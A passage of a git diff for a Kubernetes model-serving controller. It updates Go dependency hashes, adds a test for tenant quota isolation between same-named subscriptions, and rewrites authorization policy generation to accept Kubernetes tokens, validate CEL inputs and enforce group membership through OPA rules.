 golang.org/x/time v0.12.0 h1:ScB/8o8olJvc+CQPWrK3fPZNfh7qgwCrY0zJmoEQLSE=
@@ -321,14 +325,16 @@ golang.org/x/tools v0.0.0-20190628153133-6cdbf07be9d0/go.mod h1:/rFqwRUd4F7ZHNgw
 golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
 golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
 golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
-golang.org/x/tools v0.34.0 h1:qIpSLOxeCYGg9TrcJokLBG4KFA6d795g0xkBkiESGlo=
-golang.org/x/tools v0.34.0/go.mod h1:pAP9OwEaY1CAW3HOmg3hLZC5Z0CCmzjAF2UQMSqNARg=
+golang.org/x/tools v0.39.0 h1:ik4ho21kwuQln40uelmciQPp9SipgNDdrafrYA4TmQQ=
+golang.org/x/tools v0.39.0/go.mod h1:JnefbkDPyD8UU2kI5fuf8ZX4/yUeh9W877ZeBONxUqQ=
 golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 gomodules.xyz/jsonpatch/v2 v2.5.0 h1:JELs8RLM12qJGXU4u/TO3V25KW8GreMKl9pdkk14RM0=
 gomodules.xyz/jsonpatch/v2 v2.5.0/go.mod h1:AH3dM2RI6uoBZxn3LVrfvJ3E0/9dG4cSrbuBJT4moAY=
+gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk=
+gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E=
 google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE=
 google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M=
 google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg=
@@ -347,17 +353,17 @@ google.golang.org/genproto v0.0.0-20190502173448-54afdca5d873/go.mod h1:VzzqZJRn
 google.golang.org/genproto v0.0.0-20190801165951-fa694d86fc64/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc=
 google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb h1:ITgPrl429bc6+2ZraNSzMDk3I95nmQln2fuPstKwFDE=
 google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb/go.mod h1:sAo5UzpjUwgFBCzupwhcLcxHVDK7vG5IqI30YnwX2eE=
-google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb h1:p31xT4yrYrSM/G4Sn2+TNUkVhFCbG9y8itM2S6Th950=
-google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb/go.mod h1:jbe3Bkdp+Dh2IrslsFCklNhweNTBgSYanP1UXhJDhKg=
-google.golang.org/genproto/googleapis/rpc v0.0.0-20250313205543-e70fdf4c4cb4 h1:iK2jbkWL86DXjEx0qiHcRE9dE4/Ahua5k6V8OWFb//c=
-google.golang.org/genproto/googleapis/rpc v0.0.0-20250313205543-e70fdf4c4cb4/go.mod h1:LuRYeWDFV6WOn90g357N17oMCaxpgCnbi/44qJvDn2I=
+google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 h1:fCvbg86sFXwdrl5LgVcTEvNC+2txB5mgROGmRL5mrls=
+google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:+rXWjjaukWZun3mLfjmVnQi18E1AsFbDN9QdJ5YXLto=
+google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 h1:gRkg/vSppuSQoDjxyiGfN4Upv/h/DQmIR10ZU8dh4Ww=
+google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk=
 google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
 google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38=
 google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM=
-google.golang.org/grpc v1.71.1 h1:ffsFWr7ygTUscGPI0KKK6TLrGz0476KUvvsbqWK0rPI=
-google.golang.org/grpc v1.71.1/go.mod h1:H0GRtasmQOh9LkFoCPDu3ZrwUtD1YGE+b2vYBYd/8Ec=
-google.golang.org/protobuf v1.36.6 h1:z1NpPI8ku2WgiWnf+t9wTPsn6eP1L7ksHUlkfLvd9xY=
-google.golang.org/protobuf v1.36.6/go.mod h1:jduwjTPXsFjZGTmRluh+L6NjiWu7pchiJ2/5YcXBHnY=
+google.golang.org/grpc v1.79.3 h1:sybAEdRIEtvcD68Gx7dmnwjZKlyfuc61Dyo9pGXXkKE=
+google.golang.org/grpc v1.79.3/go.mod h1:KmT0Kjez+0dde/v2j9vzwoAScgEPx/Bw1CYChhHLrHQ=
+google.golang.org/protobuf v1.36.10 h1:AYd7cD/uASjIL6Q9LiTjz8JLcrh/88q5UObnmY3aOOE=
+google.golang.org/protobuf v1.36.10/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
 gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
 gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
diff --git a/maas-controller/pkg/controller/maas/cross_namespace_test.go b/maas-controller/pkg/controller/maas/cross_namespace_test.go
index 5137c8859..bafdc977d 100644
--- a/maas-controller/pkg/controller/maas/cross_namespace_test.go
+++ b/maas-controller/pkg/controller/maas/cross_namespace_test.go
@@ -86,7 +86,7 @@ func TestMaaSAuthPolicyReconciler_CrossNamespace(t *testing.T) {
 		WithStatusSubresource(&maasv1alpha1.MaaSAuthPolicy{}).
 		Build()
 
-	r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme}
+	r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme, MaaSAPINamespace: "maas-system"}
 	req := ctrl.Request{NamespacedName: types.NamespacedName{Name: maasPolicyName, Namespace: policyNamespace}}
 	if _, err := r.Reconcile(context.Background(), req); err != nil {
 		t.Fatalf("Reconcile: unexpected error: %v", err)
@@ -182,7 +182,7 @@ func TestMaaSAuthPolicyReconciler_SelectiveModelManagement(t *testing.T) {
 		WithStatusSubresource(&maasv1alpha1.MaaSAuthPolicy{}).
 		Build()
 
-	r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme}
+	r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme, MaaSAPINamespace: "maas-system"}
 	req := ctrl.Request{NamespacedName: types.NamespacedName{Name: maasPolicyName, Namespace: policyNamespace}}
 	if _, err := r.Reconcile(context.Background(), req); err != nil {
 		t.Fatalf("Reconcile: unexpected error: %v", err)
@@ -261,7 +261,7 @@ func TestMaaSAuthPolicyReconciler_SameNameDifferentNamespaces(t *testing.T) {
 		WithStatusSubresource(&maasv1alpha1.MaaSAuthPolicy{}).
 		Build()
 
-	r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme}
+	r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme, MaaSAPINamespace: "maas-system"}
 
 	// Reconcile both policies
 	reqA := ctrl.Request{NamespacedName: types.NamespacedName{Name: "policy-a", Namespace: namespaceA}}
@@ -390,6 +390,187 @@ func TestMaaSSubscriptionReconciler_CrossNamespace(t *testing.T) {
 	}
 }
 
+// TestMaaSSubscriptionReconciler_DuplicateNameIsolation verifies that two
+// subscriptions with the same name in different namespaces get unique TRLP
+// limit keys and don't cause quota isolation bypass (CWE-284, CWE-706).
+//
+// This test validates the fix for the vulnerability where:
+//   - Tenant A has subscription "gold" (namespace: tenant-a) with limit 100 req/min
+//   - Tenant B has subscription "gold" (namespace: tenant-b) with limit 10000 req/min
+//   - Both reference the same model (default/llm)
+//   - Before fix: TRLP key collision → last subscription wins
+//   - After fix: Unique keys (namespace-name-model) → proper isolation
+func TestMaaSSubscriptionReconciler_DuplicateNameIsolation(t *testing.T) {
+	const (
+		modelName       = "llm"
+		modelNamespace  = "models"
+		httpRouteName   = "maas-model-" + modelName
+		trlpName        = "maas-trlp-" + modelName
+		subscriptionName = "gold" // SAME name in both namespaces
+		namespaceA      = "tenant-a"
+		namespaceB      = "tenant-b"
+	)
+
+	// Model and HTTPRoute (shared by both subscriptions)
+	model := &maasv1alpha1.MaaSModelRef{
+		ObjectMeta: metav1.ObjectMeta{Name: modelName, Namespace: modelNamespace},
+		Spec: maasv1alpha1.MaaSModelSpec{
+			ModelRef: maasv1alpha1.ModelReference{Kind: "ExternalModel", Name: modelName},
+		},
+	}
+	route := &gatewayapiv1.HTTPRoute{
+		ObjectMeta: metav1.ObjectMeta{Name: httpRouteName, Namespace: modelNamespace},
+	}
+
+	// Subscription "gold" in tenant-a namespace (limit: 100)
+	subA := &maasv1alpha1.MaaSSubscription{
+		ObjectMeta: metav1.ObjectMeta{Name: subscriptionName, Namespace: namespaceA},
+		Spec: maasv1alpha1.MaaSSubscriptionSpec{
+			Owner: maasv1alpha1.OwnerSpec{
+				Groups: []maasv1alpha1.GroupReference{{Name: "team-a"}},
+			},
+			ModelRefs: []maasv1alpha1.ModelSubscriptionRef{
+				{
+					Name:            modelName,
+					Namespace:       modelNamespace,
+					TokenRateLimits: []maasv1alpha1.TokenRateLimit{{Limit: 100, Window: "1m"}},
+				},
+			},
+		},
+	}
+
+	// Subscription "gold" in tenant-b namespace (limit: 10000) - SAME NAME!
+	subB := &maasv1alpha1.MaaSSubscription{
+		ObjectMeta: metav1.ObjectMeta{Name: subscriptionName, Namespace: namespaceB},
+		Spec: maasv1alpha1.MaaSSubscriptionSpec{
+			Owner: maasv1alpha1.OwnerSpec{
+				Groups: []maasv1alpha1.GroupReference{{Name: "team-b"}},
+			},
+			ModelRefs: []maasv1alpha1.ModelSubscriptionRef{
+				{
+					Name:            modelName,
+					Namespace:       modelNamespace,
+					TokenRateLimits: []maasv1alpha1.TokenRateLimit{{Limit: 10000, Window: "1m"}},
+				},
+			},
+		},
+	}
+
+	c := fake.NewClientBuilder().
+		WithScheme(scheme).
+		WithRESTMapper(testRESTMapper()).
+		WithObjects(model, route, subA, subB).
+		WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}).
+		Build()
+
+	r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme}
+
+	// Reconcile both subscriptions
+	reqA := ctrl.Request{NamespacedName: types.NamespacedName{Name: subscriptionName, Namespace: namespaceA}}
+	if _, err := r.Reconcile(context.Background(), reqA); err != nil {
+		t.Fatalf("Reconcile subscription in %q: unexpected error: %v", namespaceA, err)
+	}
+
+	reqB := ctrl.Request{NamespacedName: types.NamespacedName{Name: subscriptionName, Namespace: namespaceB}}
+	if _, err := r.Reconcile(context.Background(), reqB); err != nil {
+		t.Fatalf("Reconcile subscription in %q: unexpected error: %v", namespaceB, err)
+	}
+
+	// Get the aggregated TRLP for the model
+	trlp := &unstructured.Unstructured{}
+	trlp.SetGroupVersionKind(schema.GroupVersionKind{Group: "kuadrant.io", Version: "v1alpha1", Kind: "TokenRateLimitPolicy"})
+	if err := c.Get(context.Background(), types.NamespacedName{Name: trlpName, Namespace: modelNamespace}, trlp); err != nil {
+		t.Fatalf("Get TokenRateLimitPolicy: %v", err)
+	}
+
+	limitsMap, found, err := unstructured.NestedMap(trlp.Object, "spec", "limits")
+	if err != nil || !found {
+		t.Fatalf("spec.limits not found: found=%v err=%v", found, err)
+	}
+
+	// CRITICAL: Verify both subscriptions have UNIQUE limit entries
+	// Format: "{namespace}-{name}-{model}-tokens"
+	keyA := namespaceA + "-" + subscriptionName + "-" + modelName + "-tokens"
+	keyB := namespaceB + "-" + subscriptionName + "-" + modelName + "-tokens"
+
+	if keyA == keyB {
+		t.Fatalf("SECURITY BUG: Limit keys are identical (%q), this would cause quota isolation bypass!", keyA)
+	}
+
+	limitA, hasA := limitsMap[keyA]
+	limitB, hasB := limitsMap[keyB]
+
+	if !hasA {
+		t.Errorf("Limit entry for tenant-a subscription not found, expected key %q, got keys: %v", keyA, getMapKeys(limitsMap))
+	}
+	if !hasB {
+		t.Errorf("Limit entry for tenant-b subscription not found, expected key %q, got keys: %v", keyB, getMapKeys(limitsMap))
+	}
+
+	// Verify predicate includes namespace to prevent cross-tenant matching
+	// Format: auth.identity.selected_subscription_key == "{namespace}/{name}@{modelNamespace}/{modelName}"
+	if hasA {
+		limitAMap := limitA.(map[string]interface{})
+		whenSlice, _, _ := unstructured.NestedSlice(limitAMap, "when")
+		if len(whenSlice) > 0 {
+			predMap := whenSlice[0].(map[string]interface{})
+			pred := predMap["predicate"].(string)
+			expectedPredA := `auth.identity.selected_subscription_key == "` + namespaceA + "/" + subscriptionName + "@" + modelNamespace + "/" + modelName + `"`
+			if pred != expectedPredA {
+				t.Errorf("Tenant-a predicate = %q, want %q", pred, expectedPredA)
+			}
+			// CRITICAL: Predicate must NOT match tenant-b's subscription
+			if !containsString(pred, namespaceA) {
+				t.Errorf("SECURITY BUG: Tenant-a predicate doesn't include namespace: %s", pred)
+			}
+		}
+	}
+
+	if hasB {
+		limitBMap := limitB.(map[string]interface{})
+		whenSlice, _, _ := unstructured.NestedSlice(limitBMap, "when")
+		if len(whenSlice) > 0 {
+			predMap := whenSlice[0].(map[string]interface{})
+			pred := predMap["predicate"].(string)
+			expectedPredB := `auth.identity.selected_subscription_key == "` + namespaceB + "/" + subscriptionName + "@" + modelNamespace + "/" + modelName + `"`
+			if pred != expectedPredB {
+				t.Errorf("Tenant-b predicate = %q, want %q", pred, expectedPredB)
+			}
+			// CRITICAL: Predicate must NOT match tenant-a's subscription
+			if !containsString(pred, namespaceB) {
+				t.Errorf("SECURITY BUG: Tenant-b predicate doesn't include namespace: %s", pred)
+			}
+		}
+	}
+
+	// Verify both limit entries exist (no overwrite/collision)
+	if len(limitsMap) < 2 {
+		t.Errorf("Expected at least 2 limit entries (one per subscription), got %d: %v", len(limitsMap), getMapKeys(limitsMap))
+	}
+}
+
+// Helper function for test
+func getMapKeys(m map[string]interface{}) []string {
+	keys := make([]string, 0, len(m))
+	for k := range m {
+		keys = append(keys, k)
+	}
+	return keys
+}
+
+func containsString(s, substr string) bool {
+	return len(s) >= len(substr) && findSubstringInString(s, substr)
+}
+
+func findSubstringInString(s, substr string) bool {
+	for i := 0; i <= len(s)-len(substr); i++ {
+		if s[i:i+len(substr)] == substr {
+			return true
+		}
+	}
+	return false
+}
+
 // TestMaaSModelRefDeletion_CrossNamespaceIsolation verifies that deleting
 // a model in one namespace doesn't affect a same-named model in another namespace.
 func TestMaaSModelRefDeletion_CrossNamespaceIsolation(t *testing.T) {
diff --git a/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go b/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go
index a664b10a7..b205df4d9 100644
--- a/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go
+++ b/maas-controller/pkg/controller/maas/maasauthpolicy_controller.go
@@ -18,8 +18,10 @@ package maas
 
 import (
 	"context"
+	"encoding/json"
 	"errors"
 	"fmt"
+	"sort"
 	"strings"
 
 	"github.com/go-logr/logr"
@@ -58,13 +60,6 @@ type MaaSAuthPolicyReconciler struct {
 	ClusterAudience string
 }
 
-func (r *MaaSAuthPolicyReconciler) gatewayName() string {
-	if r.GatewayName != "" {
-		return r.GatewayName
-	}
-	return defaultGatewayName
-}
-
 func (r *MaaSAuthPolicyReconciler) clusterAudience() string {
 	if r.ClusterAudience != "" {
 		return r.ClusterAudience
@@ -78,6 +73,7 @@ func (r *MaaSAuthPolicyReconciler) clusterAudience() string {
 //+kubebuilder:rbac:groups=maas.opendatahub.io,resources=maasmodelrefs,verbs=get;list;watch
 //+kubebuilder:rbac:groups=kuadrant.io,resources=authpolicies,verbs=get;list;watch;create;update;patch;delete
 //+kubebuilder:rbac:groups=gateway.networking.k8s.io,resources=httproutes,verbs=get;list;watch
+//+kubebuilder:rbac:groups=config.openshift.io,resources=authentications,verbs=get
 
 // Reconcile is part of the main kubernetes reconciliation loop
 const maasAuthPolicyFinalizer = "maas.opendatahub.io/authpolicy-cleanup"
@@ -142,18 +138,33 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex
 				}
 				continue
 			}
+			if errors.Is(err, ErrHTTPRouteNotFound) {
+				// HTTPRoute doesn't exist yet - skip for now. HTTPRoute watch will trigger reconciliation when route is created.
+				log.Info("HTTPRoute not found for model, skipping AuthPolicy creation", "model", ref.Namespace+"/"+ref.Name)
+				continue
+			}
 			return nil, fmt.Errorf("failed to resolve HTTPRoute for model %s/%s: %w", ref.Namespace, ref.Name, err)
 		}
 
+		// Validate model namespace and name for CEL injection prevention
+		if err := validateCELValue(ref.Namespace, "model namespace"); err != nil {
+			return nil, fmt.Errorf("invalid model namespace in modelRef %s/%s: %w", ref.Namespace, ref.Name, err)
+		}
+		if err := validateCELValue(ref.Name, "model name"); err != nil {
+			return nil, fmt.Errorf("invalid model name in modelRef %s/%s: %w", ref.Namespace, ref.Name, err)
+		}
+
 		// Find ALL auth policies for this model (not just the current one)
 		allPolicies, err := findAllAuthPoliciesForModel(ctx, r.Client, ref.Namespace, ref.Name)
 		if err != nil {
 			return nil, fmt.Errorf("failed to list auth policies for model %s/%s: %w", ref.Namespace, ref.Name, err)
 		}
 
-		// Aggregate membership conditions from ALL auth policies
-		// Using API key validation selectors (auth.metadata.apiKeyValidation.*)
-		var membershipConditions []interface{}
+		// Aggregate allowed groups and users from ALL auth policies
+		// Will be checked in OPA policy that handles both API keys and K8s tokens
+		// Initialize as empty slices (not nil) so json.Marshal produces [] instead of null
+		allowedGroups := []string{}
+		allowedUsers := []string{}
 		var policyNames []string
 		for _, ap := range allPolicies {
 			policyNames = append(policyNames, ap.Name)
@@ -161,23 +172,25 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex
 				if err := validateCELValue(group.Name, "group name"); err != nil {
 					return nil, fmt.Errorf("invalid subject in MaaSAuthPolicy %s: %w", ap.Name, err)
 				}
-				membershipConditions = append(membershipConditions, map[string]interface{}{
-					"operator": "incl", "selector": "auth.metadata.apiKeyValidation.groups", "value": group.Name,
-				})
+				allowedGroups = append(allowedGroups, group.Name)
 			}
 			for _, user := range ap.Spec.Subjects.Users {
 				if err := validateCELValue(user, "username"); err != nil {
 					return nil, fmt.Errorf("invalid subject in MaaSAuthPolicy %s: %w", ap.Name, err)
 				}
-				membershipConditions = append(membershipConditions, map[string]interface{}{
-					"operator": "eq", "selector": "auth.metadata.apiKeyValidation.username", "value": user,
-				})
+				allowedUsers = append(allowedUsers, user)
 			}
 		}
 
+		// Deduplicate and sort to ensure stable output across reconciles
+		// (Kubernetes List order is not guaranteed to be deterministic)
+		policyNames = deduplicateAndSort(policyNames)
+		allowedGroups = deduplicateAndSort(allowedGroups)
+		allowedUsers = deduplicateAndSort(allowedUsers)
+
 		// Construct API URLs using configured namespace
 		apiKeyValidationURL := fmt.Sprintf("https://maas-api.%s.svc.cluster.local:8443/internal/v1/api-keys/validate", r.MaaSAPINamespace)
-		subscriptionSelectorURL := fmt.Sprintf("https://maas-api.%s.svc.cluster.local:8443/v1/subscriptions/select", r.MaaSAPINamespace)
+		subscriptionSelectorURL := fmt.Sprintf("https://maas-api.%s.svc.cluster.local:8443/internal/v1/subscriptions/select", r.MaaSAPINamespace)
 
 		rule := map[string]interface{}{
 			"metadata": map[string]interface{}{
@@ -194,28 +207,31 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex
 					"metrics":  false,
 					"priority": int64(0),
 				},
-				// Call subscription selector endpoint to determine user's subscription
-				// Priority 1 ensures this runs after apiKeyValidation (priority 0)
+				// Resolve subscription via maas-api
+				// For API keys: uses subscription bound to the key at mint time
+				// For K8s tokens: uses X-MaaS-Subscription header if provided, otherwise finds all accessible
+				// Priority 1 ensures this runs after apiKeyValidation (priority 0).
 				"subscription-info": map[string]interface{}{
 					"http": map[string]interface{}{
 						"url":         subscriptionSelectorURL,
 						"contentType": "application/json",
 						"method":      "POST",
 						"body": map[string]interface{}{
-							"expression": `{
-  "groups": auth.metadata.apiKeyValidation.groups,
-  "username": auth.metadata.apiKeyValidation.username,
-  "requestedSubscription": "x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : ""
-}`,
+							"expression": fmt.Sprintf(`{
+  "groups": auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.groups : auth.identity.user.groups,
+  "username": auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.username : auth.identity.user.username,
+  "requestedSubscription": auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.subscription : ("x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : ""),
+  "requestedModel": "%s/%s"
+}`, ref.Namespace, ref.Name),
 						},
 					},
-					// Cache subscription selection results keyed by username, groups, and requested subscription.
-					// Key format: "username|groups-hash|requested-subscription" ensures different cache entries
-					// when the same user has different groups or requests different subscriptions.
+					// Cache subscription selection results keyed by username, groups, requested subscription, and model.
+					// Each model has its own cache entry since subscription validation is model-specific.
+					// Key format: "username|groups-hash|requested-subscription|model-namespace/model-name"
 					// Groups are joined with commas to create a stable string representation.
 					"cache": map[string]interface{}{
 						"key": map[string]interface{}{
-							"selector": `auth.metadata.apiKeyValidation.username + "|" + auth.metadata.apiKeyValidation.groups.join(",") + "|" + ("x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : "")`,
+							"selector": fmt.Sprintf(`(auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.username : auth.identity.user.username) + "|" + (auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.groups : auth.identity.user.groups).join(",") + "|" + (auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.subscription : ("x-maas-subscription" in request.headers ? request.headers["x-maas-subscription"] : "")) + "|%s/%s"`, ref.Namespace, ref.Name),
 						},
 						"ttl": int64(60),
 					},
@@ -225,54 +241,119 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex
 			},
 			"authentication": map[string]interface{}{
 				// API Keys - plain authentication, actual validation in metadata layer
+				// Only processes tokens with sk-oai- prefix (OpenAI-compatible API keys)
 				"api-keys": map[string]interface{}{
 					"plain": map[string]interface{}{
 						"selector": "request.headers.authorization",
 					},
+					"when": []interface{}{
+						map[string]interface{}{
+							"selector": "request.headers.authorization",
+							"operator": "matches",
+							"value":    "^Bearer sk-oai-.*",
+						},
+					},
 					"metrics":  false,
 					"priority": int64(0),
 				},
+				// Kubernetes/OpenShift tokens - validated via TokenReview API
+				// Only enabled for /v1/models endpoint (read-only model listing)
+				// Inferencing endpoints require API keys for billing/tracking
+				// The api-keys authentication (priority 0) runs first and will consume API key requests,
+				// so we don't need to explicitly exclude them here
+				"kubernetes-tokens": map[string]interface{}{
+					"kubernetesTokenReview": map[string]interface{}{
+						"audiences": []interface{}{r.clusterAudience()},
+					},
+					"when": []interface{}{
+						map[string]interface{}{
+							"selector": "request.url_path",
+							"operator": "matches",
+							"value":    ".*/v1/models$",
+						},
+						map[string]interface{}{
+							"selector": "request.headers.authorization",
+							"operator": "neq",
+							"value":    "",
+						},
+					},
+					"metrics":  false,
+					"priority": int64(1),
+				},
 			},
 		}
 
 		// Build authorization rules
 		authRules := make(map[string]interface{})
 
-		// Validate that API key is valid
-		authRules["api-key-valid"] = map[string]interface{}{
+		// Validate authentication: API key must be valid, OR K8s token must be authenticated
+		// For API keys: check apiKeyValidation.valid == true (boolean)
+		// For K8s tokens: check that identity.username exists (TokenReview succeeded)
+		authRules["auth-valid"] = map[string]interface{}{
 			"metrics":  false,
 			"priority": int64(0),
-			"patternMatching": map[string]interface{}{
-				"patterns": []interface{}{
-					map[string]interface{}{
-						"selector": "auth.metadata.apiKeyValidation.valid",
-						"operator": "eq",
-						"value":    "true",
-					},
-				},
+			"opa": map[string]interface{}{
+				"rego": `# API key authentication: validate the key
+allow {
+  object.get(input.auth.metadata, "apiKeyValidation", {})
+  input.auth.metadata.apiKeyValidation.valid == true
+}
+
+# Kubernetes token authentication: check identity exists
+allow {
+  object.get(input.auth.identity, "user", {}).username != ""
+}`,
 			},
 		}
 
-		// Check for subscription selection errors and deny if present
-		authRules["subscription-error-check"] = map[string]interface{}{
+		// Fail-close: require successful subscription selection (name must be present)
+		authRules["subscription-valid"] = map[string]interface{}{
 			"metrics":  false,
 			"priority": int64(0),
 			"opa": map[string]interface{}{
-				"rego": `allow { not object.get(input.auth.metadata["subscription-info"], "error", false) }`,
+				"rego": `allow { object.get(input.auth.metadata["subscription-info"], "name", "") != "" }`,
 			},
 		}
 
 		// Build aggregated authorization rule from ALL auth policies' subjects
-		if len(membershipConditions) > 0 {
-			var patterns []interface{}
-			if len(membershipConditions) == 1 {
-				patterns = membershipConditions
-			} else {
-				patterns = []interface{}{map[string]interface{}{"any": membershipConditions}}
-			}
+		// Uses OPA to check membership for both API keys and K8s tokens
+		if len(allowedGroups) > 0 || len(allowedUsers) > 0 {
+			groupsJSON, _ := json.Marshal(allowedGroups)
+			usersJSON, _ := json.Marshal(allowedUsers)
 			authRules["require-group-membership"] = map[string]interface{}{
-				"metrics": false, "priority": int64(0),
-				"patternMatching": map[string]interface{}{"patterns": patterns},
+				"metrics":  false,
+				"priority": int64(0),
+				"opa": map[string]interface{}{
+					"rego": fmt.Sprintf(`
+# Allowed groups and users from all MaaSAuthPolicies
+allowed_groups := %s
+allowed_users := %s
+
+# Extract username from API key or K8s token
+username := input.auth.metadata.apiKeyValidation.username
+    { object.get(input.auth, "metadata", {}).apiKeyValidation.username != "" }
+else := input.auth.identity.user.username
+    { object.get(input.auth, "identity", {}).user.username != "" }
+else := ""
+
+# Extract groups from API key or K8s token
+groups := input.auth.metadata.apiKeyValidation.groups
+    { object.get(input.auth, "metadata", {}).apiKeyValidation.groups != [] }
+else := input.auth.identity.user.groups
+    { object.get(input.auth, "identity", {}).user.groups != [] }
+else := []
+
+# Allow if user is in allowed users
+allow {
+    username == allowed_users[_]
+}
+
+# Allow if any user group is in allowed groups
+allow {
+    groups[_] == allowed_groups[_]
+}
+`, string(groupsJSON), string(usersJSON)),
+				},
 			}
 		}
 
@@ -283,30 +364,40 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex
 		// Pass ALL user groups unfiltered in the response so TokenRateLimitPolicy predicates can
 		// match against subscription groups (which may differ from auth policy groups).
 		// Also inject subscription metadata from subscription-info for Limitador metrics.
-		// Groups and username come from API key validation.
+		// For API keys: username/groups come from apiKeyValidation metadata
+		// For K8s tokens: username/groups come from auth.identity
 		rule["response"] = map[string]interface{}{
 			"success": map[string]interface{}{
 				"headers": map[string]interface{}{
-					// Username from API key validation
+					// Username from API key validation or K8s token identity
 					"X-MaaS-Username": map[string]interface{}{
 						"plain": map[string]interface{}{
-							"selector": "auth.metadata.apiKeyValidation.username",
+							"expression": `auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.username : auth.identity.user.username`,
 						},
 						"metrics":  false,
 						"priority": int64(0),
 					},
-					// Groups - construct JSON array string from API key validation groups
+					// Groups - construct JSON array string from API key validation or K8s identity
 					"X-MaaS-Group": map[string]interface{}{
 						"plain": map[string]interface{}{
-							"expression": `'["' + auth.metadata.apiKeyValidation.groups.join('","') + '"]'`,
+							"expression": `'["' + (auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.groups : auth.identity.user.groups).join('","') + '"]'`,
 						},
 						"metrics":  false,
 						"priority": int64(0),
 					},
-					// Key ID for tracking
+					// Key ID for tracking (only for API keys)
 					"X-MaaS-Key-Id": map[string]interface{}{
 						"plain": map[string]interface{}{
-							"selector": "auth.metadata.apiKeyValidation.keyId",
+							"expression": `auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.keyId : ""`,
+						},
+						"metrics":  false,
+						"priority": int64(0),
+					},
+					// Subscription bound to API key (only for API keys)
+					// For K8s tokens, this header is not injected (empty string)
+					"X-MaaS-Subscription": map[string]interface{}{
+						"plain": map[string]interface{}{
